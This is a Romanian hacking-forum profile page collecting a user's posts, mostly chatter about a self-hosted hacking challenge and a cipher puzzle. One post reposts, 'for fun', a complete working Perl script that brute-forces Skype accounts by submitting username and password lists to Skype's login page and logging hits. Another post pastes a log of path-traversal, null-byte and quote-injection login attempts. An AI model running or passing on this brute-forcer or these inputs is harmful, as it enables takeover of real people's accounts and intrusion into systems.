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Everything posted by MecaniQ

  1. Incearca CGI,e cel mai bun google> CGI encript!
  2. mysql_query("DELETE stupidity FROM earth") or die("Stupidity");


  3. Vorbe multe si proaste. ********* nu sunt acei 12 copii de la "Internat". Si nu au fost prinsi. Sunt si acum pe IRC
  4. Wow ce bine informati sunteti,aveti motiv de chat? sau nu gasiti nici 1 subiect;
  5. Nu e nici un vps "ciordit"...faceti nmap si vedeti in ce sta Ise.
  6. Hai dai pace...site removed... e exagerat 1 luna si nimeni nimic... Fratilor daca vreti sa invatati ceva cu adevarat,va astept pe WeChall,ma gasiti sub nickul hacker_dizzy... pana atunci... .. .... .....
  7. [1337 zone][17.03.2012|21:03:20] WRONG! Login request with user:[ admin ] and password:[ fecb55ad8bb6fd8dc281219b4e144f16 ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:20] WRONG! Login request with user:[ ..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini ] and password:[ d41d8cd98f00b204e9800998ecf8427e ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:20] WRONG! Login request with user:[ ?\0xa7 ] and password:[ d41d8cd98f00b204e9800998ecf8427e ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:21] WRONG! Login request with user:[ ] and password:[ f8366d90bf4bb0f51d5cb7c491c1b97e ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:21] WRONG! Login request with user:[ admin ] and password:[ c4ca4238a0b923820dcc509a6f75849b ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:21] WRONG! Login request with user:[ ] and password:[ f92c0a47aea289a87677cb3673379d64 ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:21] WRONG! Login request with user:[ paginadepagina.php\0 ] and password:[ d41d8cd98f00b204e9800998ecf8427e ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:21] WRONG! Login request with user:[ /.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./windows/win.ini ] and password:[ d41d8cd98f00b204e9800998ecf8427e ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:21] WRONG! Login request with user:[ 1\" ] and password:[ d41d8cd98f00b204e9800998ecf8427e ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:21] WRONG! Login request with user:[ admin ] and password:[ 96e79218965eb72c92a549dd5a330112 ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:21] WRONG! Login request with user:[ ] and password:[ f827f198e111e71cd04f722d54a31ac7 ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:22] WRONG! Login request with user:[ paginadepagina.php/. ] and password:[ d41d8cd98f00b204e9800998ecf8427e ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:22] WRONG! Login request with user:[ \'\" ] and password:[ d41d8cd98f00b204e9800998ecf8427e ] | IP Address: [ xxx ] -------------------------------- [1337 zone][17.03.2012|21:03:22] WRONG! Login request with user:[ admin ] and password:[ 202cb962ac59075b964b07152d234b70 ] | IP Address: [ xxx ] -------------------------------- O da..in felul asta sigur sunteti "hackeri" adevarati!
  8. Deci chiar nimeni?
  9. Exact:) site-ul merge perfect,am avut un mic bug la sql de aceea a parut chestia aia. Acum puteti sai dati bataie,nu va faceti griji,nimeni nu va da in judecata sau chestii de genul(am rezolvat eu). SO GO ON! Un shell ceva?
  10. pai nu se pune,din moment ce nu ai scos user/pass... dar totusi ai reusit ceva;) de admirat bravo:D
  11. Eroare nu cred. Am verificat Logul azi dim,iar cat despre solutie,nimeni nici macar pe aproape nu a fost;))
  12. Hello all din nou! Am facut un mic challenge pentru voi toti! Fiecare are ocazia sa iti testeze scripturile,metodele,chiar si abilitatile sa zic asa Am dedicat siteul pentru RSTCenter,dar desigur vor fii si altii care vor incerca... Sunt interesat mai ales in privinta lui Ahead am vazut ca stie cate ceva... www.crack.trei.ro Datii bataie cu ce vreti SQL Inject etc...Atata timp cat reusiti sa scoateti admin si pass,si de ce nu un DEMASK TOTAL! Siteul va sta online cel putin cateva luni ca fiecare sa aibe timp destul de testare. P.S.: Exista si un log cu incercari/reusite pentru a putea vedea ipul,metoda,data,ora dupa care voi face un Hall of Fame si Hall of Shame! Cheers!
  13. Good job! sa imi dai add pe mess pt domeniu.
  14. Nu eu am facut scriptul eu doar lam gasit si am zis sa il postez sa va distrati:) Aveti nevoie de linux pentru acest script. #!perl #----------------------------------------------------------------------------------------------| #With this program you can bruteforce skype accounts | #Authors: Alexander Rachev (a.k.a matrix_killer) | #Contact: matrix_k _at_ abv.bg | #Version: 1.0 | #Copyright: this program is under a Creative Commons Attribution 2.5 Bulgaria License. | #Greets: Bl0od3r, Acid_BDS, Alpha-fan and all other friends[they know who they are ] | # !WARNING! | # THIS PROGRAM IS MADE FOR EDUCATION PURPOSES ONLY ! I'M NOT RESPONSIBLE FOR YOUR ACTIONS !!! | #----------------------------------------------------------------------------------------------| #http://search.cpan.org/~dland/Crypt-SSLeay-0.54/SSLeay.pm IS REQUIRED !!!! use Getopt::Std; use HTTP::Request::Common qw(POST); use LWP::UserAgent; $SIG{'INT'} = \&sig_catch;$SIG{'HUP'}='IGNORE';$SIG{'TERM'}='IGNORE'; $SIG{'CHLD'}='IGNORE';$SIG{'ALRM'}='IGNORE'; $| = 1; sub sig_catch { exit; } getopts('u:p:'); our($opt_u,$opt_p); my $userlist = $opt_u; my $passlist = $opt_p; if ($userlist eq "") { print "\n"; print "***************************************************************************\n"; print "Skype Bruteforcer v1.0 \n"; print "By Alexander Rachev(a.k.a matrix_killer) \n"; print "usage: perl $0 -u <users> -p <passwords> \n"; print "***************************************************************************\n"; exit (1); } open(USERS, "<$userlist") || die ("Cannot open username file"); open(WORDS, "<$passlist") || die ("Cannot open password file"); @users= <USERS>; @words= <WORDS>; close(USERS); close(WORDS); $i=0; foreach $user (@users) { chomp($user); foreach $pass (@words) { chomp($pass); $ua = LWP::UserAgent->new; printf("\n%5d Trying $user:$pass", ++$i); my $req = POST 'https://secure.skype.com/store/member/dologin.html', [ username => $user, password => $pass, login => 'Sign+me+in' ]; my $res = $ua->request($req); if ($res->as_string =~ /cookiecheck/gi) { open (LOG, ">>bruted_skype_accounts.txt"); $time = time(); $loctime = localtime($time); print LOG "\n"; print LOG "Time: $loctime\n"; print LOG "username: $user\n"; print LOG "passowrd: $pass\n\n"; close(LOG); }}}
  15. Iata un chalenge pentru incepatori,foarte simplu,criptat de 3x (ce metode nu zic). Scoateti textul la iveala si primul care reuseste are de la mine un domeniu mocca,pe 1 an! g/==RJyse21jk/07dg0+R/vAkxXSlfj8gf=7o/zMedfS=Lmqgh0jRf1ebcesRHet=355
  16. Esti%as > megan 35
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